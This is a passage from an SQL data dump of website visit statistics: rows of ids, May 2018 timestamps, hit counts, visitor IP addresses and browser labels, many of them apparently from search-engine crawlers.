226.23.240','other'),(247111,1526642481,1,1,0,0,'54.36.148.11','other'),(247112,1526642491,1,1,0,0,'54.36.148.114','other'),(247113,1526642583,1,1,0,0,'54.36.148.202','other'),(247114,1526642643,1,1,0,0,'54.36.149.52','other'),(247115,1526642770,1,1,0,0,'207.46.13.141','other'),(247116,1526642808,1,1,0,0,'91.196.178.69','firefox'),(247117,1526642970,1,1,0,0,'54.36.149.43','other'),(247118,1526643075,1,1,0,0,'54.36.149.63','other'),(247119,1526643113,1,1,0,0,'54.36.148.94','other'),(247120,1526643174,1,0,1,0,'66.249.70.25',''),(247121,1526643284,1,1,0,0,'54.36.148.59','other'),(247122,1526643362,1,1,0,0,'54.36.148.69','other'),(247123,1526643496,1,0,1,0,'66.249.64.30',''),(247124,1526643601,1,1,0,0,'8.29.198.27','other'),(247125,1526643787,2,2,0,0,'141.8.142.74','other'),(247126,1526643849,1,1,0,0,'54.36.148.199','other'),(247127,1526643955,1,1,0,0,'54.36.148.115','other'),(247128,1526644022,1,1,0,0,'54.36.148.26','other'),(247129,1526644086,1,1,0,0,'54.36.148.39','other'),(247130,1526644117,1,1,0,0,'54.36.148.240','other'),(247131,1526644235,1,1,0,0,'207.46.13.141','other'),(247132,1526644635,1,1,0,0,'54.36.149.87','other'),(247133,1526644695,1,1,0,0,'178.95.81.174','chrome'),(247134,1526644730,1,1,0,0,'54.36.148.225','other'),(247135,1526645221,1,1,0,0,'54.36.148.116','other'),(247136,1526645456,1,1,0,0,'66.249.70.25','chrome'),(247137,1526645481,1,1,0,0,'54.36.148.24','other'),(247138,1526645856,1,1,0,0,'54.36.149.52','other'),(247139,1526646036,1,1,0,0,'207.46.13.132','other'),(247140,1526646240,1,1,0,0,'91.196.177.46','chrome'),(247141,1526646321,1,1,0,0,'54.36.148.166','other'),(247142,1526646528,1,1,0,0,'91.124.85.55','chrome'),(247143,1526646657,1,1,0,0,'54.36.148.102','other'),(247144,1526646662,4,4,0,0,'91.196.177.134','chrome'),(247145,1526646742,1,1,0,0,'54.36.149.9','other'),(247146,1526646892,1,1,0,0,'54.36.148.187','other'),(247147,1526646899,1,1,0,0,'54.36.148.210','other'),(247148,1526646991,1,1,0,0,'91.196.178.90','chrome'),(247149,1526647200,2,1,1,0,'66.249.64.28',''),(247150,1526647237,1,1,0,0,'54.36.149.14','other'),(247151,1526647355,2,2,0,0,'37.53.231.225','chrome'),(247152,1526647722,1,1,0,0,'54.36.149.93','other'),(247153,1526647776,1,1,0,0,'216.244.66.237','other'),(247154,1526648154,1,1,0,0,'141.8.142.74','other'),(247155,1526648209,2,2,0,0,'91.196.177.46','chrome'),(247156,1526648353,1,1,0,0,'77.222.134.102','chrome'),(247157,1526648673,1,1,0,0,'54.36.149.1','other'),(247158,1526648706,1,1,0,0,'216.244.66.237','other'),(247159,1526648930,1,1,0,0,'54.36.148.152','other'),(247160,1526649056,1,1,0,0,'178.154.200.41','other'),(247161,1526649346,1,1,0,0,'8.29.198.26','other'),(247162,1526649461,1,1,0,0,'54.36.148.110','other'),(247163,1526649773,1,1,0,0,'92.112.227.105','firefox'),(247164,1526649966,1,1,0,0,'94.178.227.7','chrome'),(247165,1526650041,1,1,0,0,'54.36.149.107','other'),(247166,1526650099,1,1,0,0,'54.36.149.17','other'),(247167,1526650314,3,3,0,0,'91.196.177.134','chrome'),(247168,1526650620,1,0,1,0,'66.249.64.28',''),(247169,1526650657,1,1,0,0,'54.36.149.67','other'),(247170,1526650831,1,1,0,0,'54.36.148.226','other'),(247171,1526650889,1,1,0,0,'66.249.70.25','chrome'),(247172,1526651003,1,1,0,0,'54.36.148.237','other'),(247173,1526651090,1,1,0,0,'95.158.3.62','chrome'),(247174,1526651265,1,1,0,0,'54.36.148.236','other'),(247175,1526651281,1,1,0,0,'54.36.148.173','other'),(247176,1526651402,1,1,0,0,'54.36.148.101','other'),(247177,1526651523,1,1,0,0,'54.36.148.97','other'),(247178,1526651878,1,1,0,0,'91.196.178.74','firefox'),(247179,1526651931,2,2,0,0,'141.8.142.74','other'),(247180,1526651970,1,1,0,0,'54.36.148.119','other'),(247181,1526651988,1,1,0,0,'54.36.148.151','other'),(247182,1526652112,1,1,0,0,'54.36.149.72','other'),(247183,1526652221,1,1,0,0,'37.9.113.182','other'),(247184,1526652400,1,1,0,0,'217.69.133.4','other'),(247185,1526652540,1,1,0,0,'178.154.200.41','other'),(247186,1526652609,1,1,0,0,'188.230.43.254','other'),(247187,1526652665,1,1,0,0,'66.249.64.30','chrome'),(247188,1526652737,1,1,0,0,'54.36.149.7','other'),(247189,1526653215,1,1,0,0,'141.8.142.74','other'),(247190,1526653292,1,1,0,0,'54.36.148.233','other'),(247191,1526653324,1,1,0,0,'54.36.149.30','other'),(247192,1526653511,1,1,0,0,'54.36.148.152','other'),(247193,1526653676,2,2,0,0,'178.154.171.88','other'),(247194,1526654085,1,1,0,0,'54.36.149.78','other'),(247195,1526654262,1,1,0,0,'180.76.15.20','other'),(247196,1526654274,1,1,0,0,'54.36.149.67','other'),(247197,1526654457,1,1,0,0,'8.29.198.25','other'),(247198,1526655005,1,1,0,0,'188.230.43.254','other'),(247199,1526655010,1,1,0,0,'54.36.148.63','other'),(247200,1526655390,1,1,0,0,'54.36.148.33','other'),(247201,1526655449,1,1,0,0,'54.36.149.101','other'),(247202,1526655536,2,2,0,0,'141.8.142.74','other'),(247203,1526655617,1,1,0,0,'54.36.148.196','other'),(247204,1526655647,1,1,0,0,'54.36.148.28','other'),(247205,1526655650,1,1,0,0,'54.36.149.46','other'),(247206,1526655658,1,1,0,0,'216.244.66.237','other'),(247207,1526655732,1,1,0,0,'54.36.148.86','other'),(247208,1526655796,1,1,0,0,'193.106.30.99','firefox'),(247209,1526655968,1,1,0,0,'54.36.148.250','other'),(247210,1526656202,1,1,0,0,'54.36.149.11','other'),(247211,1526656380,1,1,0,0,'54.36.148.223','other'),(247212,1526656553,1,1,0,0,'54.36.148.143','other'),(247213,1526656789,1,1,0,0,'54.36.148.192','other'),(247214,1526656875,1,1,0,0,'54.36.148.235','other'),(247215,1526657037,1,1,0,0,'54.36.148.121','other'),(247216,1526657406,1,1,0,0,'188.230.43.254','other'),(247217,1526657655,1,1,0,0,'54.36.149.25','other'),(247218,1526657751,1,1,0,0,'54.36.148.48','other'),(247219,1526657929,1,1,0,0,'217.69.133.6','other'),(247220,1526657971,1,1,0,0,'87.250.224.46','other'),(247221,1526658185,1,1,0,0,'54.36.148.139','other'),(247222,1526658444,1,1,0,0,'141.8.142.74','other'),(247223,1526658778,1,1,0,0,'54.36.149.90','other'),(247224,1526658908,1,1,0,0,'54.36.149.97','other'),(247225,1526659121,1,1,0,0,'54.36.148.41','other'),(247226,1526659272,1,1,0,0,'54.36.148.119','other'),(247227,1526659406,1,1,0,0,'178.92.73.119','chrome'),(247228,1526659804,1,1,0,0,'188.230.43.254','other'),(247229,1526659873,1,1,0,0,'54.36.148.114','other'),(247230,1526660178,1,1,0,0,'8.29.198.27','other'),(247231,1526660536,1,1,0,0,'54.36.149.32','other'),(247232,1526660648,1,1,0,0,'54.36.148.147','other'),(247233,1526660824,2,0,2,0,'66.249.64.29',''),(247234,1526660880,2,2,0,0,'91.196.178.168','chrome'),(247235,1526661147,1,1,0,0,'5.248.133.25','chrome'),(247236,1526661289,1,1,0,0,'178.154.171.88','other'),(247237,1526661722,1,1,0,0,'141.8.142.74','other'),(247238,1526661754,1,1,0,0,'216.244.66.237','other'),(247239,1526662328,1,1,0,0,'54.36.148.226','other'),(247240,1526662500,1,1,0,0,'217.69.133.4','other'),(247241,1526662974,1,1,0,0,'54.36.149.84','other'),(247242,1526662976,1,0,1,0,'66.249.70.25',''),(247243,1526663190,1,1,0,0,'66.249.70.25','chrome'),(247244,1526663291,1,1,0,0,'66.249.64.28','chrome'),(247245,1526663332,1,1,0,0,'157.55.39.77','other'),(247246,1526663522,1,1,0,0,'35.226.23.240','other'),(247247,1526663727,1,1,0,0,'217.69.133.5','other'),(247248,1526663918,2,2,0,0,'178.154.171.88','other'),(247249,1526663922,1,1,0,0,'180.76.15.33','other'),(247250,1526663928,1,1,0,0,'54.36.148.106','other'),(247251,1526664005,1,1,0,0,'217.69.133.3','other'),(247252,1526664033,1,1,0,0,'54.36.148.118','other'),(247253,1526664378,1,1,0,0,'87.250.224.46','other'),(247254,1526664399,1,1,0,0,'54.36.148.173','other'),(247255,1526664481,1,1,0,0,'54.36.148.240','other'),(247256,1526664669,1,1,0,0,'54.36.148.86','other'),(247257,1526664805,1,1,0,0,'54.36.149.69','other'),(247258,1526664857,3,3,0,0,'141.8.142.74','other'),(247259,1526664883,1,1,0,0,'54.36.148.34','other'),(247260,1526665305,1,1,0,0,'8.29.198.27','other'),(247261,1526665659,1,1,0,0,'54.36.148.236','other'),(247262,1526665783,1,1,0,0,'13.56.232.243','chrome'),(247263,1526665792,1,1,0,0,'216.244.66.237','other'),(247264,1526666041,1,1,0,0,'54.36.148.136','other'),(247265,1526666100,1,1,0,0,'54.36.148.11','other'),(247266,1526666600,1,1,0,0,'54.36.149.98','other'),(247267,1526666604,1,1,0,0,'54.36.148.105','other'),(247268,1526666775,1,1,0,0,'54.36.148.45','other'),(247269,1526666907,1,1,0,0,'54.36.149.34','other'),(247270,1526667368,1,1,0,0,'54.36.148.27','other'),(247271,1526667412,1,1,0,0,'54.36.148.63','other'),(247272,1526667501,1,1,0,0,'178.154.171.88','other'),(247273,1526667518,1,1,0,0,'54.36.149.86','other'),(247274,1526667613,1,1,0,0,'54.36.148.225','other'),(247275,1526667619,2,0,2,0,'66.249.64.30',''),(247276,1526667682,1,1,0,0,'54.36.149.77','other'),(247277,1526667967,1,1,0,0,'54.36.148.102','other'),(247278,1526668486,1,1,0,0,'91.196.178.88','firefox'),(247279,1526668487,1,1,0,0,'37.73.207.107','chrome'),(247280,1526669003,1,1,0,0,'66.249.70.27','chrome'),(247281,1526669052,1,1,0,0,'54.36.149.72','other'),(247282,1526669060,1,1,0,0,'66.249.64.29','chrome'),(247283,1526669068,1,1,0,0,'94.180.227.211','msie'),(247284,1526669272,1,1,0,0,'54.36.149.59','other'),(247285,1526669463,3,3,0,0,'141.8.142.74','other'),(247286,1526669583,1,1,0,0,'54.36.148.52','other'),(247287,1526669674,1,1,0,0,'54.36.148.152','other'),(247288,1526669874,1,1,0,0,'54.36.149.95','other'),(247289,1526669925,1,0,1,0,'66.249.70.25',''),(247290,1526670068,1,1,0,0,'54.36.149.50','other'),(247291,1526670085,3,0,3,0,'66.249.64.29',''),(247292,1526670154,1,0,1,0,'66.249.64.30',''),(247293,1526670381,1,1,0,0,'217.69.133.203','other'),(247294,1526670450,1,1,0,0,'217.69.133.6','other'),(247295,1526670479,2,2,0,0,'141.8.142.74','other'),(247296,1526670747,1,1,0,0,'54.36.148.239','other'),(247297,1526670848,1,1,0,0,'54.36.148.235','other'),(247298,1526671007,1,1,0,0,'8.29.198.27','other'),(247299,1526671398,1,1,0,0,'54.36.148.188','other'),(247300,1526671782,1,1,0,0,'54.36.148.36','other'),(247301,1526671832,1,1,0,0,'54.36.149.3','other'),(247302,1526672790,1,1,0,0,'141.8.142.74','other'),(247303,1526672874,1,1,0,0,'54.36.149.86','other'),(247304,1526672954,1,1,0,0,'54.36.149.93','other'),(247305,1526673606,1,1,0,0,'54.36.149.66','other'),(247306,1526673965,1,1,0,0,'54.36.148.137','other'),(247307,1526674067,1,1,0,0,'54.36.148.201','other'),(247308,1526674443,1,1,0,0,'178.154.171.88','other'),(247309,1526674451,1,1,0,0,'54.36.148.125','other'),(247310,1526674569,1,1,0,0,'194.187.170.107','other'),(247311,1526674657,1,1,0,0,'54.36.148.148','other'),(247312,1526675282,1,1,0,0,'180.76.15.9','other'),(247313,1526675408,1,1,0,0,'54.36.149.13','other'),(247314,1526675585,1,1,0,0,'66.249.70.29','chrome'),(247315,1526675761,1,1,0,0,'54.36.149.12','other'),(247316,1526675847,1,1,0,0,'54.36.149.65','other'),(247317,1526676045,1,1,0,0,'54.36.148.230','other'),(247318,1526676124,1,1,0,0,'54.36.148.224','other'),(247319,1526676152,1,1,0,0,'8.29.198.25','other'),(247320,1526676261,1,1,0,0,'54.36.149.87','other'),(247321,1526676331,1,1,0,0,'207.46.13.141','other'),(247322,1526676930,1,1,0,0,'54.36.148.210','other'),(247323,1526677043,1,1,0,0,'91.214.132.13','chrome'),(247324,1526677219,1,1,0,0,'54.36.148.249','other'),(247325,1526677221,2,2,0,0,'54.36.148.98','other'),(247326,1526677900,1,1,0,0,'54.36.148.115','other'),(247327,1526678130,1,1,0,0,'141.8.142.74','other'),(247328,1526678480,1,1,0,0,'54.36.149.7','other'),(247329,1526678487,1,1,0,0,'54.36.148.130','other'),(247330,1526678603,1,1,0,0,'54.36.148.114','other'),(247331,1526678679,1,1,0,0,'80.77.162.99','firefox'),(247332,1526678738,1,1,0,0,'54.36.148.228','other'),(247333,1526678972,1,1,0,0,'54.36.148.196','other'),(247334,1526679051,1,1,0,0,'54.36.148.197','other'),(247335,1526679117,1,1,0,0,'54.36.149.23','other'),(247336,1526679119,1,1,0,0,'141.8.142.74','other'),(247337,1526679124,1,1,0,0,'54.36.149.99','other'),(247338,1526679131,1,1,0,0,'54.36.148.206','other'),(247339,1526679745,1,1,0,0,'54.36.148.39','other'),(247340,1526679808,1,1,0,0,'185.5.249.252','firefox'),(247341,1526679870,1,1,0,0,'54.36.148.209','other'),(247342,1526680137,1,1,0,0,'54.36.148.50','other'),(247343,1526680154,1,1,0,0,'193.106.30.99','firefox'),(247344,1526680513,1,1,0,0,'54.36.148.203','other'),(247345,1526680629,1,1,0,0,'54.36.149.6','other'),(247346,1526680653,1,1,0,0,'178.154.171.88','other'),(247347,1526680658,1,1,0,0,'54.36.149.19','other'),(247348,1526680776,1,1,0,0,'141.8.142.74','other'),(247349,1526680797,1,1,0,0,'54.36.149.77','other'),(247350,1526681059,1,1,0,0,'54.36.148.117','other'),(247351,1526681198,1,1,0,0,'54.36.148.26','other'),(247352,1526681374,1,1,0,0,'178.255.215.94','other'),(247353,1526681379,1,1,0,0,'54.36.148.76','other'),(247354,1526681440,1,1,0,0,'35.226.23.240','other'),(247355,1526681467,1,1,0,0,'54.36.148.19','other'),(247356,1526681598,1,1,0,0,'220.181.132.195','chrome'),(247357,1526681611,1,1,0,0,'216.244.66.237','other'),(247358,1526681632,1,1,0,0,'54.36.149.4','other'),(247359,1526681661,1,1,0,0,'178.154.171.88','other'),(247360,1526681837,1,1,0,0,'8.29.198.26','other'),(247361,1526681861,1,1,0,0,'217.69.133.3','other'),(247362,1526681953,1,1,0,0,'54.36.148.169','other'),(247363,1526682282,1,1,0,0,'54.36.148.92','other'),(247364,1526682467,1,1,0,0,'54.36.148.53','other'),(247365,1526682804,1,1,0,0,'54.36.148.133','other'),(247366,1526683202,1,1,0,0,'87.250.224.46','other'),(247367,1526683319,1,1,0,0,'54.36.149.2','other'),(247368,1526683852,1,0,1,0,'66.249.70.25',''),(247369,1526684122,1,1,0,0,'54.36.148.66','other'),(247370,1526684153,1,1,0,0,'54.36.149.48','other'),(247371,1526684189,2,2,0,0,'54.36.149.44','other'),(247372,1526684235,1,1,0,0,'54.36.149.62','other'),(247373,1526684549,1,1,0,0,'54.36.149.11','other'),(247374,1526684645,1,1,0,0,'54.36.148.152','other'),(247375,1526684778,1,1,0,0,'54.36.148.157','other'),(247376,1526684871,1,1,0,0,'54.36.149.106','other'),(247377,1526685117,1,1,0,0,'54.36.148.24','other'),(247378,1526685155,1,1,0,0,'54.36.148.244','other'),(247379,1526685161,1,1,0,0,'54.36.148.19','other'),(247380,1526685595,1,1,0,0,'207.46.13.141','other'),(247381,1526685948,1,1,0,0,'54.36.148.34','other'),(247382,1526686545,2,2,0,0,'141.8.142.74','other'),(247383,1526686620,1,1,0,0,'217.69.133.3','other'),(247384,1526686653,3,3,0,0,'217.69.133.5','other'),(247385,1526686659,1,1,0,0,'54.36.148.19','other'),(247386,1526686841,1,1,0,0,'54.36.149.19','other'),(247387,1526686944,1,1,0,0,'54.36.148.33','other'),(247388,1526686996,1,1,0,0,'8.29.198.27','other'),(247389,1526687506,1,1,0,0,'54.36.149.66','other'),(247390,1526687512,1,1,0,0,'54.36.148.251','other'),(247391,1526687666,1,1,0,0,'54.36.148.222','other'),(247392,1526687879,1,1,0,0,'54.36.149.10','other'),(247393,1526688530,1,1,0,0,'54.36.149.102','other'),(247394,1526688566,1,1,0,0,'54.36.148.174','other'),(247395,1526688811,1,1,0,0,'54.36.148.187','other'),(247396,1526688994,1,1,0,0,'54.36.148.32','other'),(247397,1526689047,1,1,0,0,'216.244.66.237','other'),(247398,1526689479,1,1,0,0,'54.36.148.130','other'),(247399,1526689480,1,1,0,0,'54.36.148.104','other'),(247400,1526689507,1,1,0,0,'54.36.149.77','other'),(247401,1526689513,1,1,0,0,'54.36.148.236','other'),(247402,1526689622,1,1,0,0,'54.36.148.74','other'),(247403,1526689766,1,1,0,0,'207.46.13.132','other'),(247404,1526691231,1,1,0,0,'54.36.148.143','other'),(247405,1526691283,2,2,0,0,'141.8.142.74','other'),(247406,1526691325,1,1,0,0,'54.36.149.12','other'),(247407,1526691338,1,1,0,0,'54.36.148.24','other'),(247408,1526691524,1,1,0,0,'216.244.66.237','other'),(247409,1526691648,1,1,0,0,'54.36.148.147','other'),(247410,1526691818,1,1,0,0,'54.36.149.47','other'),(247411,1526691892,1,1,0,0,'163.172.4.153','chrome'),(247412,1526692185,1,1,0,0,'54.36.148.106','other'),(247413,1526692216,1,1,0,0,'178.140.122.215','msie'),(247414,1526692265,1,1,0,0,'54.36.148.200','other'),(247415,1526692524,1,1,0,0,'217.69.133.223','other'),(247416,1526692526,1,1,0,0,'217.69.133.226','other'),(247417,1526692631,1,1,0,0,'217.69.133.4','other'),(247418,1526692670,1,1,0,0,'8.29.198.27','other'),(247419,1526692719,1,1,0,0,'54.36.149.68','other'),(247420,1526692877,1,1,0,0,'54.36.148.15','other'),(247421,1526693048,1,0,1,0,'66.249.64.30',''),(247422,1526693395,1,1,0,0,'54.36.148.202','other'),(247423,1526693399,1,1,0,0,'54.36.149.43','other'),(247424,1526693515,1,1,0,0,'54.36.149.100','other'),(247425,1526694056,1,1,0,0,'217.69.133.203','other'),(247426,1526694173,1,1,0,0,'54.36.148.130','other'),(247427,1526694274,1,1,0,0,'54.36.148.39','other'),(247428,1526694659,1,1,0,0,'54.36.149.31','other'),(247429,1526694839,1,1,0,0,'54.36.148.124','other'),(247430,1526694897,1,1,0,0,'54.36.148.94','other'),(247431,1526695042,1,1,0,0,'178.255.215.94','other'),(247432,1526695257,1,1,0,0,'54.36.148.144','other'),(247433,1526695441,1,1,0,0,'54.36.149.0','other'),(247434,1526695444,1,1,0,0,'54.36.148.152','other'),(247435,1526695454,1,1,0,0,'54.36.148.60','other'),(247436,1526695566,1,1,0,0,'54.36.148.215','other'),(247437,1526695582,1,1,0,0,'141.8.142.74','other'),(247438,1526695949,1,1,0,0,'54.36.149.103','other'),(247439,1526696034,1,1,0,0,'54.36.148.62','other'),(247440,1526696218,1,1,0,0,'54.36.148.34','other'),(247441,1526696866,1,1,0,0,'54.36.148.247','other'),(247442,1526696941,1,1,0,0,'54.36.148.65','other'),(247443,1526697834,1,1,0,0,'8.29.198.26','other'),(247444,1526697900,1,1,0,0,'178.154.171.88','other'),(247445,1526698091,1,0,1,0,'66.249.64.30',''),(247446,1526698097,1,1,0,0,'141.8.142.74','other'),(247447,1526698257,1,1,0,0,'54.36.148.158','other'),(247448,1526698460,1,1,0,0,'54.36.148.83','other'),(247449,1526698647,1,1,0,0,'54.36.149.85','other'),(247450,1526698657,1,1,0,0,'54.36.149.20','other'),(247451,1526698800,1,1,0,0,'54.36.148.26','other'),(247452,1526698951,1,1,0,0,'54.36.148.153','other'),(247453,1526699045,1,1,0,0,'141.8.142.74','other'),(247454,1526699046,1,1,0,0,'178.154.171.88','other'),(247455,1526699506,1,1,0,0,'54.36.148.21','other'),(247456,1526699954,1,1,0,0,'54.36.148.230','other'),(247457,1526700011,1,1,0,0,'54.36.149.105','other'),(247458,1526700072,1,1,0,0,'54.36.149.48','other'),(247459,1526700087,1,1,0,0,'217.69.133.3','other'),(247460,1526700114,1,1,0,0,'54.36.148.12','other'),(247461,1526700157,1,1,0,0,'54.36.148.178','other'),(247462,1526700359,1,1,0,0,'54.36.148.79','other'),(247463,1526700407,1,1,0,0,'54.36.149.62','other'),(247464,1526700429,1,1,0,0,'54.36.148.11','other'),(247465,1526700515,1,1,0,0,'54.36.149.2','other'),(247466,1526700722,2,2,0,0,'141.8.142.74','other'),(247467,1526700838,1,1,0,0,'178.154.171.88','other'),(247468,1526700908,1,1,0,0,'54.36.148.59','other'),(247469,1526701014,1,1,0,0,'54.36.148.111','other'),(247470,1526701144,2,2,0,0,'54.36.149.80','other'),(247471,1526701593,1,1,0,0,'54.36.148.215','other'),(247472,1526701631,1,1,0,0,'54.36.149.22','other'),(247473,1526701660,1,1,0,0,'54.36.149.21','other'),(247474,1526702355,2,2,0,0,'216.244.66.237','other'),(247475,1526702903,2,2,0,0,'54.36.148.246','other'),(247476,1526703154,1,1,0,0,'54.36.149.29','other'),(247477,1526703506,1,1,0,0,'8.29.198.27','other'),(247478,1526703538,10,10,0,0,'192.151.145.178','other'),(247479,1526704141,1,1,0,0,'54.36.148.255','other'),(247480,1526704490,1,1,0,0,'54.36.149.28','other'),(247481,1526704763,1,1,0,0,'217.69.133.2','other'),(247482,1526704956,1,1,0,0,'46.161.9.39','firefox'),(247483,1526705152,1,1,0,0,'54.36.149.43','other'),(247484,1526705264,1,1,0,0,'54.36.148.55','other'),(247485,1526706057,1,1,0,0,'178.255.215.94','other'),(247486,1526706134,1,1,0,0,'217.69.133.5','other'),(247487,1526706212,1,1,0,0,'178.154.171.88','other'),(247488,1526706823,1,1,0,0,'54.36.149.74','other'),(247489,1526707189,1,1,0,0,'213.180.203.7','other'),(247490,1526707420,1,1,0,0,'176.38.177.157','chrome'),(247491,1526707581,1,1,0,0,'54.36.148.176','other'),(247492,1526707616,1,1,0,0,'54.36.148.160','other'),(247493,1526707666,1,1,0,0,'37.9.113.82','other'),(247494,1526707741,1,1,0,0,'54.36.149.0','other'),(247495,1526707820,1,1,0,0,'54.36.148.244','other'),(247496,1526707954,1,1,0,0,'54.36.148.182','other'),(247497,1526708115,1,1,0,0,'54.36.149.12','other'),(247498,1526708678,1,1,0,0,'8.29.198.25','other'),(247499,1526708772,1,1,0,0,'193.106.30.99','firefox'),(247500,1526708913,1,1,0,0,'54.36.149.22','other'),(247501,1526708914,1,1,0,0,'141.8.142.74','other'),(247502,1526709077,1,1,0,0,'54.36.148.63','other'),(247503,1526709338,1,1,0,0,'216.244.66.237','other'),(247504,1526709412,1,1,0,0,'54.36.148.25','other'),(247505,1526710253,1,1,0,0,'141.8.142.74','other'),(247506,1526710381,1,1,0,0,'54.36.148.240','other'),(247507,1526710405,1,1,0,0,'37.204.152.151','msie'),(247508,1526710517,1,1,0,0,'207.46.13.141','other'),(247509,1526710664,3,3,0,0,'91.196.177.114','chrome'),(247510,1526710854,1,1,0,0,'54.36.148.176','other'),(247511,1526711149,1,1,0,0,'216.244.66.237','other'),(247512,1526711288,1,1,0,0,'54.36.149.12','other'),(247513,1526711392,1,1,0,0,'54.36.149.39','other'),(247514,1526711703,1,1,0,0,'54.36.148.101','other'),(247515,1526711824,1,1,0,0,'54.36.148.32','other'),(247518,1526711841,1,1,0,0,'54.36.148.197','other'),(247519,1526712010,1,1,0,0,'54.36.148.69','other'),(247520,1526712043,1,1,0,0,'54.36.148.143','other'),(247521,1526712050,1,1,0,0,'54.36.148.192','other'),(247522,1526712322,1,1,0,0,'217.69.133.3','other'),(247523,1526712548,1,1,0,0,'54.36.149.84','other'),(247524,1526712709,1,1,0,0,'216.244.66.237','other'),(247525,1526712946,1,1,0,0,'54.36.148.59','other'),(247526,1526713565,1,1,0,0,'54.36.148.194','other'),(247527,1526713581,1,1,0,0,'178.154.171.88','other'),(247528,1526713613,1,1,0,0,'54.36.148.46','other'),(247529,1526713731,1,1,0,0,'54.36.148.71','other'),(247530,1526713789,1,1,0,0,'54.36.149.59','other'),(247531,1526713941,1,1,0,0,'54.36.148.186','other'),(247532,1526714079,1,1,0,0,'54.36.148.170','other'),(247533,1526714119,1,1,0,0,'54.36.148.32','other'),(247534,1526714343,1,1,0,0,'8.29.198.27','other'),(247535,1526714421,1,1,0,0,'54.36.149.98','other'),(247536,1526714490,1,1,0,0,'54.36.149.32','other'),(247537,1526714496,1,1,0,0,'54.36.148.237','other'),(247538,1526714663,1,1,0,0,'35.226.23.240','other'),(247539,1526714695,1,1,0,0,'216.244.66.237','other'),(247540,1526714837,2,2,0,0,'178.154.171.88','other'),(247541,1526714950,1,1,0,0,'217.69.133.225','other'),(247542,1526715077,1,1,0,0,'54.36.148.167','other'),(247543,1526715343,1,0,1,0,'66.249.64.29',''),(247544,1526715902,1,1,0,0,'54.36.148.59','other'),(247545,1526715905,1,1,0,0,'54.36.148.252','other'),(247546,1526716118,1,1,0,0,'54.36.148.81','other'),(247547,1526716169,1,1,0,0,'54.36.149.46','other'),(247548,1526716241,4,4,0,0,'46.4.121.23','other'),(247549,1526716327,1,1,0,0,'54.36.148.78','other'),(247550,1526716777,1,1,0,0,'54.36.148.214','other'),(247551,1526716791,1,1,0,0,'54.36.149.30','other'),(247552,1526716806,1,1,0,0,'216.244.66.237','other'),(247553,1526716835,1,1,0,0,'54.36.148.222','other'),(247554,1526716890,1,1,0,0,'54.36.148.26','other'),(247555,1526717378,1,1,0,0,'54.36.149.46','other'),(247556,1526717495,1,1,0,0,'54.36.148.95','other'),(247557,1526717576,1,1,0,0,'217.69.133.9','other'),(247558,1526717882,1,1,0,0,'54.36.148.167','other'),(247559,1526718252,1,1,0,0,'120.35.38.13','other'),(247560,1526718407,1,1,0,0,'66.249.64.29','chrome'),(247561,1526718688,1,1,0,0,'54.36.148.170','other'),(247562,1526718731,1,1,0,0,'54.36.148.131','other'),(247563,1526718862,1,1,0,0,'54.36.148.25','other'),(247564,1526719168,3,3,0,0,'216.244.66.237','other'),(247565,1526719186,1,1,0,0,'54.36.148.161','other'),(247566,1526719523,1,1,0,0,'8.29.198.26','other'),(247567,1526719587,1,1,0,0,'54.36.148.126','other'),(247568,1526719595,1,1,0,0,'178.92.22.42','chrome'),(247569,1526719867,1,1,0,0,'178.154.200.28','other'),(247570,1526720013,1,1,0,0,'54.36.148.21','other'),(247571,1526720156,1,1,0,0,'178.154.171.88','other'),(247572,1526720281,1,1,0,0,'54.36.148.208','other'),(247573,1526720455,1,1,0,0,'216.244.66.237','other'),(247574,1526720730,1,1,0,0,'54.36.148.71','other'),(247575,1526721344,1,1,0,0,'54.36.148.58','other'),(247576,1526721663,1,1,0,0,'54.36.148.238','other'),(247577,1526721680,1,1,0,0,'54.36.149.12','other'),(247578,1526721792,1,1,0,0,'80.252.155.198','chrome'),(247579,1526721836,1,1,0,0,'54.36.149.46','other'),(247580,1526721860,2,2,0,0,'216.244.66.237','other'),(247581,1526722214,1,1,0,0,'178.154.171.88','other'),(247582,1526722311,1,1,0,0,'54.36.149.5','other'),(247583,1526722585,1,1,0,0,'217.69.133.203','other'),(247584,1526722797,1,1,0,0,'54.36.148.21','other'),(247585,1526722990,1,1,0,0,'54.36.148.132','other'),(247586,1526723368,1,1,0,0,'91.196.178.132','firefox'),(247587,1526723503,2,2,0,0,'141.8.142.74','other'),(247588,1526723545,1,1,0,0,'54.36.148.83','other'),(247589,1526723599,1,1,0,0,'217.69.133.6','other'),(247590,1526723638,1,1,0,0,'194.44.196.31','chrome'),(247591,1526723656,1,1,0,0,'54.36.148.80','other'),(247592,1526723667,1,1,0,0,'216.244.66.237','other'),(247593,1526723707,1,1,0,0,'217.69.133.194','other'),(247594,1526723783,1,1,0,0,'217.69.133.5','other'),(247595,1526724063,1,1,0,0,'178.154.171.88','other'),(247596,1526724224,1,1,0,0,'54.36.148.164','other'),(247597,1526724232,1,1,0,0,'180.76.15.143','other'),(247598,1526724298,1,1,0,0,'54.36.148.232','other'),(247599,1526724324,1,1,0,0,'54.36.149.91','other'),(247600,1526724681,1,1,0,0,'54.36.148.170','other'),(247601,1526724969,1,1,0,0,'54.36.148.97','other'),(247602,1526725088,1,1,0,0,'54.36.148.120','other'),(247603,1526725096,1,1,0,0,'54.36.148.139','other'),(247604,1526725104,1,1,0,0,'54.36.148.132','other'),(247605,1526725172,1,1,0,0,'8.29.198.27','other'),(247606,1526725648,1,1,0,0,'54.36.148.52','other'),(247607,1526726231,1,1,0,0,'54.36.148.137','other'),(247608,1526726716,1,1,0,0,'54.36.148.181','other'),(247609,1526726737,1,1,0,0,'54.36.148.145','other'),(247610,1526726774,1,1,0,0,'54.36.148.65','other'),(247611,1526726962,1,1,0,0,'54.36.148.219','other'),(247612,1526726972,1,1,0,0,'54.36.149.97','other'),(247613,1526727149,1,1,0,0,'54.36.148.70','other'),(247614,1526727192,1,1,0,0,'54.36.148.221','other'),(247615,1526727221,1,1,0,0,'66.249.70.29','chrome'),(247616,1526727638,1,1,0,0,'54.36.148.57','other'),(247617,1526727873,1,1,0,0,'54.36.148.68','other'),(247618,1526727970,1,1,0,0,'216.244.66.237','other'),(247619,1526728052,1,1,0,0,'54.36.149.102','other'),(247620,1526728358,1,1,0,0,'54.36.148.94','other'),(247621,1526729442,1,1,0,0,'54.36.149.32','other'),(247622,1526729454,1,1,0,0,'54.36.149.44','other'),(247623,1526729696,1,1,0,0,'54.36.149.48','other'),(247624,1526729733,1,1,0,0,'54.36.149.97','other'),(247625,1526729866,1,1,0,0,'217.69.133.203','other'),(247626,1526729954,1,1,0,0,'54.36.149.58','other'),(247627,15267